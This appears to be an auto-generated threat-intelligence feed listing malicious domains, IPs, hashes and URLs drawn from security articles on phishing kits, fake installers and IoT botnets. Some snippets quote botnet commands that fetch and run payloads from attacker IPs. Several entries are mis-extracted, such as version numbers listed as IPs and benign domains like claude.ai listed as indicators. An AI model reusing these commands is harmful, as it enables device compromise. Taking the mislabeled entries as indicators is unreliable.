Indicators of compromise
4,114 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| domain | realestatecotblrp.vu | htional[.]vu monttmmlrustcompany[.]vu mtprormtductions[.]vu realestatecotblrp[.]vu siottxgroup[.]vu summitcapitaltrapojininggroup[.]vu techc | Inside Knight Office, a New M365 AiTM Phishing Kit Huntress | · 15d ago |
| domain | siottxgroup.vu | stcompany[.]vu mtprormtductions[.]vu realestatecotblrp[.]vu siottxgroup[.]vu summitcapitaltrapojininggroup[.]vu techcompositnkoes[.]vu | Inside Knight Office, a New M365 AiTM Phishing Kit Huntress | · 15d ago |
| domain | summitcapitaltrapojininggroup.vu | prormtductions[.]vu realestatecotblrp[.]vu siottxgroup[.]vu summitcapitaltrapojininggroup[.]vu techcompositnkoes[.]vu techromixsolutionlonsinc[.]vu Phis | Inside Knight Office, a New M365 AiTM Phishing Kit Huntress | · 15d ago |
| domain | techcompositnkoes.vu | rp[.]vu siottxgroup[.]vu summitcapitaltrapojininggroup[.]vu techcompositnkoes[.]vu techromixsolutionlonsinc[.]vu Phishing domains used by th | Inside Knight Office, a New M365 AiTM Phishing Kit Huntress | · 15d ago |
| domain | techromixsolutionlonsinc.vu | u summitcapitaltrapojininggroup[.]vu techcompositnkoes[.]vu techromixsolutionlonsinc[.]vu Phishing domains used by the threat actors involved in th | Inside Knight Office, a New M365 AiTM Phishing Kit Huntress | · 15d ago |
| sha256 | ba83cc3c9535690191018edf73ca5c6001609df9919462796aa2e551f142e4d3 | ckage - io.base.one887 Application - StrεαmTV Pro SHA-256 - ba83cc3c9535690191018edf73ca5c6001609df9919462796aa2e551f142e4d3 Package - io.meat.hint Application - Sistema de vídeo C2 IP | Meta Ads Push StreamRat Android Trojan That Can Gain Near-Complete Device Control The Hacker News | · 15d ago |
| sha256 | e0714788b4e2518b0d9d4cbf18c7217bb97718e01689d77338f1cc4a230fcb6c | d the following indicators of compromise (IoCs) - SHA-256 - e0714788b4e2518b0d9d4cbf18c7217bb97718e01689d77338f1cc4a230fcb6c Package - io.base.one887 Application - StrεαmTV Pro SHA-256 | Meta Ads Push StreamRat Android Trojan That Can Gain Near-Complete Device Control The Hacker News | · 15d ago |
| domain | playfootball.info | d by the second Apache module brought us to a domain called playfootball[.]info that has a phishing page similar to the earlier ones. Unl | Gaming the system: how a Chinese-speaking actor turned Brazilian government sites into an SEO weapon Check Point Research | · 15d ago |
| ipv4 | 176.65.148.184 | include specific log entries and the attackers’ IP address (176.65.148.184). “Given the quick succession of exploit attempts across mu | Exploitation of Sangoma Switchvox flaw is underway (CVE-2026-9586) Help Net Security | · 16d ago |
| domain | app-microsoft-edge.com.cn | c-razerzone[.]com[.]cn Peripherals / drivers Microsoft Edge app-microsoft-edge[.]com[.]cn Browser Kaspersky kaspersky-lab[.]hl[.]cn Security soft | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | baidu-pan.com.cn | s zh-diskgenius[.]com[.]cn Disk utility Baidu Netdisk (Pan) baidu-pan[.]com[.]cn Cloud storage oCam Screen Recorder ocam-pc[.]com[.]cn S | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | calibre-ebook.com.cn | pc-razerzone[.]com[.]cn → hxxp://www.gehie246[.]com/712down calibre-ebook[.]com[.]cn → hxxp://www.gehie246[.]com/712down Brand-impersonation | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | cc8ttkv35b.com | and to rotating delivery hosts ( yimxg25tiy[.]com/73inst , cc8ttkv35b[.]com/7qinst , n7b8t85zsg[.]com/ins711 ) and a suspected attack | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | cn-drawio.com.cn | m Screen Recorder ocam-pc[.]com[.]cn Screen capture draw.io cn-drawio[.]com[.]cn Diagramming SteelSeries steelseries-cn[.]com[.]cn Perip | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | com.cn | bapc, zh-tbtool, web-tbtool, zh-doubaosrf, ieway-cn (all [.]com[.]cn / [.]hl[.]cn) Various utilities Although these domains im | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | gehie246.com | nd downloading app_setup.6653004.zip from the delivery host gehie246[.]com/712down ; two content-distinct copies of the same-named a | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | gw-sogou.com.cn | ing SteelSeries steelseries-cn[.]com[.]cn Peripherals Sogou gw-sogou[.]com[.]cn Input method Calibre calibre-ebook[.]com[.]cn E-book Mi | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | hl.cn | l, web-tbtool, zh-doubaosrf, ieway-cn (all [.]com[.]cn / [.]hl[.]cn) Various utilities Although these domains impersonate unr | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | kaspersky-lab.hl.cn | alidated hash set is in the indicators of compromise below. kaspersky-lab[.]hl[.]cn → hxxp://www.gehie246[.]com/712down pc-razerzone[.]com[ | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | mindmoster.com.cn | ibre calibre-ebook[.]com[.]cn E-book MindMaster (typosquat) mindmoster[.]com[.]cn Mind-mapping Others pc-codex, jinshan-cibapc, zh-tbtool | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | n7b8t85zsg.com | hosts ( yimxg25tiy[.]com/73inst , cc8ttkv35b[.]com/7qinst , n7b8t85zsg[.]com/ins711 ) and a suspected attacker-controlled Alibaba Clou | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | ocam-pc.com.cn | an) baidu-pan[.]com[.]cn Cloud storage oCam Screen Recorder ocam-pc[.]com[.]cn Screen capture draw.io cn-drawio[.]com[.]cn Diagramming | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | oijfwe.net | led Multiple C:\ProgramData\ payloads 103.183.3[.]162:5090 (oijfwe[.]net) Connection failed Stage-one / persistent payloads Alibab | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | pc-razerzone.com.cn | lemetry captured a device navigating to the fake Razer page pc-razerzone[.]com[.]cn and downloading app_setup.6653004.zip from the delivery | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | sejda.hl.cn | spersky kaspersky-lab[.]hl[.]cn Security software Sejda PDF sejda[.]hl[.]cn Productivity NetEase Youdao Dictionary translate-youdao | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | steelseries-cn.com.cn | apture draw.io cn-drawio[.]com[.]cn Diagramming SteelSeries steelseries-cn[.]com[.]cn Peripherals Sogou gw-sogou[.]com[.]cn Input method Cali | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | translate-youdao.hl.cn | PDF sejda[.]hl[.]cn Productivity NetEase Youdao Dictionary translate-youdao[.]hl[.]cn Translation DiskGenius zh-diskgenius[.]com[.]cn Disk ut | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | www.gehie246.com | ns. pc-razerzone[.]com[.]cn (spoofed Razer download site) → www[.]gehie246[.]com/712down → app_setup.6653004.zip → stage-one loader A de | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | yimxg25tiy.com | nation page that served it and to rotating delivery hosts ( yimxg25tiy[.]com/73inst , cc8ttkv35b[.]com/7qinst , n7b8t85zsg[.]com/ins71 | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | zh-diskgenius.com.cn | ictionary translate-youdao[.]hl[.]cn Translation DiskGenius zh-diskgenius[.]com[.]cn Disk utility Baidu Netdisk (Pan) baidu-pan[.]com[.]cn C | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| sha256 | 1bd3662d784840e410d2d3c0a1040277f7f549089447359f01e05c2559cb1f17 | ocessFolderPath C:\ProgramData\.exe InitiatingProcessSHA256 1bd3662d784840e410d2d3c0a1040277f7f549089447359f01e05c2559cb1f17 InitiatingProcessCommandLine ".exe" InitiatingProcessCreati | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| sha256 | 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8 | ogram Files (x86)\72q1o6\40gK5T.exe InitiatingProcessSHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8 InitiatingProcessCommandLine "40gK5T.exe" InitiatingProcess | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| url | http://www.gehie246[ | e indicators of compromise below. kaspersky-lab[.]hl[.]cn → hxxp://www.gehie246[.]com/712down pc-razerzone[.]com[.]cn → hxxp://www.gehie246[ | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 16d ago |
| domain | aguamammillaria.cfd | h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net plosancol.aguamammillaria[.]cfd crironxil.aguasedum[.]cfd TCP traffic to another domain: | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| domain | aguasedum.cfd | urewebsites[.]net plosancol.aguamammillaria[.]cfd crironxil.aguasedum[.]cfd TCP traffic to another domain: tcp[:]//omzagdmspc.a.pingg | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| domain | azurewebsites.net | e text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortcut: S | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| domain | colombstracciatella.cfd | r: "Contrato Via Docusing" <[email protected][.]cfd> Date: Wed, 26 Aug 2026 19:01:16 -0300 Subject: Assine co | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| domain | pinggy.link | m[.]cfd TCP traffic to another domain: tcp[:]//omzagdmspc.a.pinggy[.]link:21601/ Note: I saw HTTPS traffic to WhatsApp and GitHub d | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| [email protected] | 2026 22:01:41 +0000 (UTC) Sender: "Contrato Via Docusing" <[email protected][.]cfd> Date: Wed, 26 Aug 2026 19:01:16 -0300 Subject: Assin | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago | |
| ipv4 | 185.254.222.105 | ceived: from relatorio01a.colombstracciatella.cfd (unknown [185.254.222.105]) [information removed] ; Wed, 26 Aug 2026 22:01:41 +0000 ( | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| sha256 | 47d2908c4dd7f6f5eb4a8ef4306077b10315c44231f4bacd2bb811b245561911 | e: Zip archive data, at least v2.0 to extract SHA-256 hash: 47d2908c4dd7f6f5eb4a8ef4306077b10315c44231f4bacd2bb811b245561911 File size: 1,553 bytes File name: 868283789726483.lNk File | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| sha256 | a6044786991afdb9d42ceb350943987765a7d0e8537369b2092e3f019c0f63ca | he infection, doesn't appear to be malicious: SHA-256 hash: a6044786991afdb9d42ceb350943987765a7d0e8537369b2092e3f019c0f63ca File size: 266,242 bytes File type: PE32+ executable (DLL) | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| sha256 | cc44782356cb0effc528a7ab22c19ab360a55ebbbe01feb0967031aa191c5869 | d zip archive and extracted Windows shortcut: SHA-256 hash: cc44782356cb0effc528a7ab22c19ab360a55ebbbe01feb0967031aa191c5869 File size: 1,661 bytes File name: 868283789726483.zip File | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| sha256 | f62a958faf0491b2b2803be2ee69b664b58e4a1261f64e8530cdc1a3ff666aa4 | It script for the persistent Guildma malware: SHA-256 hash: f62a958faf0491b2b2803be2ee69b664b58e4a1261f64e8530cdc1a3ff666aa4 File size: 277,874 bytes File type: Data File location: C:\ | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| url | https://sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[ | 684.BPSE.CONTRATOS.DIGITAIS.pdf Link from the message text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortc | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 16d ago |
| domain | centrodigestionedellarapina.life | ate. Indicators of compromise (IOCs) Drainer infrastructure centrodigestionedellarapina[.]life dasunerforschtelandamendederwelt[.]sbs Solana address use | Fake GTA 6 leaked copy drains your crypto wallet Malwarebytes Labs | · 16d ago |
| domain | dasunerforschtelandamendederwelt.sbs | ) Drainer infrastructure centrodigestionedellarapina[.]life dasunerforschtelandamendederwelt[.]sbs Solana address used by the page’s inline transfer 21iWU6F | Fake GTA 6 leaked copy drains your crypto wallet Malwarebytes Labs | · 16d ago |
| ipv4 | 176.65.148.184 | pts originating from: Indicator Type Description IP Address 176.65.148.184 was observed targeting the vulnerable Switchvox /pa endpoin | CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability Horizon3.ai | · 16d ago |
| ipv4 | 8.2.2.1 | release notes describe CVE-2026-9586 as affecting Switchvox 8.2.2.1, while the CNA record specifies 8.3 (104997). Organizations | CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability Horizon3.ai | · 16d ago |
| ipv4 | 8.4.0.2 | goma Switchvox SMB Edition 8.3 (104997), versions less than 8.4.0.2 The available public sources contain some inconsistency reg | CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability Horizon3.ai | · 16d ago |
| domain | ip.me | ’t belong to the face on the video call. “The user accessed ip[.]me directly to determine their public-facing IP address just | North Korea-linked IT Workers Are Getting Hired Inside Western Companies Security Affairs | · 16d ago |
| domain | claude.ai | so: How attackers hosted a fake Claude download page on the claude.ai domain Subscribe to our breaking news e-mail alert to never | Anthropic locks out Claude users after infostealers hijack login sessions Help Net Security | · 18d ago |
| domain | hunt.io | oud and WordPress systems. The activity was uncovered after Hunt.io found an exposed server in Amsterdam that contained attack | Philippine Nuclear and Naval Targets Hit by Suspected Chinese Operator Security Affairs | · 19d ago |
| domain | docopened.jpg | hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. This serves as a document-open “canary,” alerting BlueDe | Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations Security Affairs | · 20d ago |
| domain | webhook.site | ins a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. Thi | Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations Security Affairs | · 20d ago |
| url | http://webhook[ | o contains a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. | Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations Security Affairs | · 20d ago |
| domain | ajax.net | tructure Security Agency (CISA) adds Red Hat, Linux Kernel, Ajax.NET Professional, Microsoft SQL Server, and Citrix NetScaler fl | U.S. CISA adds Red Hat, Linux Kernel, Ajax.NET Professional, Microsoft SQL Server, and Citrix NetScaler flaws to its Known Exploited Vulnerabilities catalog Security Affairs | · 20d ago |
| domain | getpdfdigital.cloud | er to a shortened URL that resolves through a redirector to getpdfdigital[.]cloud, a known attacker site used to stage malicious payloads. | Dark Caracal Deploys New Go Malware With Ethereum-Based C2 Fallback Security Affairs | · 21d ago |
| domain | ajax.net | -2015-5287), a Microsoft SQL Server bug (CVE-2019-1068), an Ajax.NET deserialization flaw (CVE-2021-23758), and a Linux Kernel v | Previously patched Citrix NetScaler flaw exploited in the wild (CVE-2026-8452) Help Net Security | · 22d ago |
| domain | nova-client.com | e official websites, only GitHub pages and Discord servers. Nova-client.com is a fake website for a client that has no real website; th | Fake Minecraft Sites Are Still Spreading WeedHack After C2 Takedown Security Affairs | · 23d ago |
| domain | trycloudflare.com | henticated session. In the demo, the fake login page used a trycloudflare.com subdomain, giving the link a valid TLS certificate and a mo | iAuthFlow v2: The $10,000 Phishing Toolkit That Survives Your Password Reset Security Affairs | · 24d ago |
| domain | cardoor.cn | nstructions from a message broker hosted on a domain called cardoor[.]cn, which tells it which app files to download and install. | Android car head units infected with proxy botnet malware through built-in software updaters Help Net Security | · 25d ago |
| domain | classtandscrest.com | ewhere for suspected fraud. The public registration page at classtandscrest[.]com (Source: Allure Security) What to check Researchers recom | A $25 template helped scammers build hundreds of phantom bank domains Help Net Security | · 28d ago |
| domain | remedycodes.site | n form was set to send submitted data to a separate domain, remedycodes[.]site. Researchers did not submit the form. That same Remedy ad | A $25 template helped scammers build hundreds of phantom bank domains Help Net Security | · 28d ago |
| domain | dtm.kijangturbo88.top | that communicated with Telegram-based infrastructure, using dtm[.]kijangturbo88[.]top as its command-and-control endpoint. “While the malware | Fake Gemini installer delivers Vidar infostealer via Google Colab lure Help Net Security | · 29d ago |
| domain | fd6fq54s6df541q23sdxfg.eu | mmand is used to download a binary called nvr from http://y.fd6fq54s6df541q23sdxfg[.]eu/nvr 1 2 3 4 / bin / sh - c nvram set rc_firewall = "sleep | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| domain | mods.net | .156[.]190/.y/pty5 hxxp://159.89.156[.]190/.y/pty6 s.shadow.mods[.]net Samples Filename SHA256 File type tty0 492780a9ac9f033055 | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| ipv4 | 132.223.202.213 | like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 132.223.202.213 Scan #3: CVE-2019-2725 - WebLogic versions 10.3.6.0 and 12. | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| ipv4 | 159.89.156.190 | DE . 1 2 3 4 5 6 7 8 9 10 11 wget - O / tmp / pty1 http : //159.89.156.190/.y/pty1; chmod +x / tmp / pty1 ; chmod 700 / tmp / pty1 ; / | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| ipv4 | 165.227.78.159 | > < / void > < void index = '2' > < string > wget http : //165.227.78.159/wl.php</string> </void> </array> <void method = 'start' / > | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| ipv4 | 194.187.209.4 | like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 194.187.209.4 Content - Type : text / xml content - length : 916 < soapen | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 2548f5b1613f6ebba2ff589c7b3416ccdd066b73644d4d212232beb1cecd9c31 | 38b360d8a836c038da4920e8c1ae620988b120613c0b1f MIPS-ELF nvr 2548f5b1613f6ebba2ff589c7b3416ccdd066b73644d4d212232beb1cecd9c31 Shell script Pty1 a4ba50129408f9f52ddabe5bfd5bfb46aea0ca48f | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 492780a9ac9f03305538b360d8a836c038da4920e8c1ae620988b120613c0b1f | s.shadow.mods[.]net Samples Filename SHA256 File type tty0 492780a9ac9f03305538b360d8a836c038da4920e8c1ae620988b120613c0b1f MIPS-ELF nvr 2548f5b1613f6ebba2ff589c7b3416ccdd066b73644d4d | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 72123c51bcdf8c1784654d9e2470e69131872407408aa3cf775ea0ace87bb9a0 | c04ae2ae8f2792711203de50d3d16de3a9f83baaf5435 MIPS-ELF Pty5 72123c51bcdf8c1784654d9e2470e69131872407408aa3cf775ea0ace87bb9a0 ARM-ELF Pty6 cee20e79f20d35b95645f0cbda1897302e6e554c50f3e6 | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 7325742dc0d939542d4c04ae2ae8f2792711203de50d3d16de3a9f83baaf5435 | abe5bfd5bfb46aea0ca48fb616f495f2610b2f1729687 MIPS-ELF Pty3 7325742dc0d939542d4c04ae2ae8f2792711203de50d3d16de3a9f83baaf5435 MIPS-ELF Pty5 72123c51bcdf8c1784654d9e2470e69131872407408aa | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | a4ba50129408f9f52ddabe5bfd5bfb46aea0ca48fb616f495f2610b2f1729687 | c7b3416ccdd066b73644d4d212232beb1cecd9c31 Shell script Pty1 a4ba50129408f9f52ddabe5bfd5bfb46aea0ca48fb616f495f2610b2f1729687 MIPS-ELF Pty3 7325742dc0d939542d4c04ae2ae8f2792711203de50d3 | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | cee20e79f20d35b95645f0cbda1897302e6e554c50f3e6754ce9293e3c1ba11c | 654d9e2470e69131872407408aa3cf775ea0ace87bb9a0 ARM-ELF Pty6 cee20e79f20d35b95645f0cbda1897302e6e554c50f3e6754ce9293e3c1ba11c ARM-ELF daymon dc52a1193ecf6096192f771ae663de6e0389840cb5ce | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | dc52a1193ecf6096192f771ae663de6e0389840cb5ceb7b979091333ce6f7f02 | f0cbda1897302e6e554c50f3e6754ce9293e3c1ba11c ARM-ELF daymon dc52a1193ecf6096192f771ae663de6e0389840cb5ceb7b979091333ce6f7f02 ARM-ELF | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| url | http://159.89.156[ | Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.]190/.y/pty3 hxxp://159.89. | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| url | http://165.227.78[ | nv : Body > < / soapenv : Envelope > We think that this URL hxxp://165.227.78[.]159/wl.php is used for the reporting purpose. Because, the | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| url | http://y.fd6fq54s6df541q23sdxfg[ | .233[.]35 68.66.253[.]100 185.61.149[.]22 Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[. | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| domain | eleethub.com | s from Eleethub The domain associated with the C2 server is eleethub[.]com . We visited the website and found a message announcing t | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| domain | los.zetas.mx | , and in the information from the botnet operators undead[@]los[.]zetas[.]mx (Figure 15). “Los Zetas” is a reference to a Mexican cr | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| sha256 | 14c351d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd36358 | aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0412e4 14c351d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd36358 6d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c1952 | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| sha256 | 6d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c195267c9b | 1d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd36358 6d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c195267c9b C2 servers eleethub[.]com irc.eleethub[.]com ghost.eleethub | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| sha256 | 7ed8fc4ad8014da327278b6afc26a2b4d4c8326a681be2d2b33fb2386eade3c6 | nets targeting IoT devices Indicators of Compromise Samples 7ed8fc4ad8014da327278b6afc26a2b4d4c8326a681be2d2b33fb2386eade3c6 dbef55cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187 | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| sha256 | d9001aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0412e4 | 5cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187e8ef6 d9001aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0412e4 14c351d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| sha256 | dbef55cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187e8ef6 | c4ad8014da327278b6afc26a2b4d4c8326a681be2d2b33fb2386eade3c6 dbef55cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187e8ef6 d9001aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0 | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| domain | downloads.openwrt.org | in OpenWrt allowed attackers to impersonate downloads from downloads.openwrt.org and make the devices download malicious updates. This means | Risks in IoT Supply Chain Palo Alto Unit 42 | · 29d ago |
| domain | iotlmao.xyz | 5889c244501288b9fa7c7dc7f1e8c5ef1291 Feb 26, 2021 13:14 UTC iotlmao[.]xyz/bins/dark.m68k a6cb6356432ca83467f6da2168be2aabbabe5d2f2d | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 0039231b2fd5e5a3d86ae3b626d35b8fed7f2887a58e32b480ac82cd82150f7c | 41b1 Feb 24, 2021 15:59 UTC 185[.]239.242.63/bins/dark.mpsl 0039231b2fd5e5a3d86ae3b626d35b8fed7f2887a58e32b480ac82cd82150f7c Feb 24, 2021 15:59 UTC 185[.]239.242.63/bins/dark.ppc 9d55a | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 02d48570f1089e2e7f4f9256bb033136c773834af31054e477e094e48cba110e | 0f30 Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.m68k 02d48570f1089e2e7f4f9256bb033136c773834af31054e477e094e48cba110e Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.mips 45ff | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 02f08ccc4a4136c89276135664267e08f1bb6795842a84c06c15478d3c3101e6 | 80a5 Feb 22, 2021, 12:32 UTC 185[.]239.242.63/bins/dark.sh4 02f08ccc4a4136c89276135664267e08f1bb6795842a84c06c15478d3c3101e6 Feb 22, 2021, 12:32 UTC 185[.]239.242.63/bins/dark.x86 f467 | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 05102e5abb23c761426c2c0f19f70f650938ea9e9295ccbb92349513c1d26c63 | 8684e17 Mar 4, 2021 10:19 UTC 45[.]133.1.133/bins/dark.mips 05102e5abb23c761426c2c0f19f70f650938ea9e9295ccbb92349513c1d26c63 Mar 4, 2021 10:19 UTC 45[.]133.1.133/bins/dark.mpsl cc996d1 | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 087fc3206ddb94e80118e7e7f0215c88409a0071b657d21071e15b7917f7cc4e | 3e61 Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.arm6 087fc3206ddb94e80118e7e7f0215c88409a0071b657d21071e15b7917f7cc4e Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.arm7 33f7 | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| sha256 | 0a664a74fcc00910170edcd5f548569b40c2c5d58fc5ced1f475dbe938684e17 | 5da833f Mar 4, 2021 10:19 UTC 45[.]133.1.133/bins/dark.m68k 0a664a74fcc00910170edcd5f548569b40c2c5d58fc5ced1f475dbe938684e17 Mar 4, 2021 10:19 UTC 45[.]133.1.133/bins/dark.mips 05102e5 | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
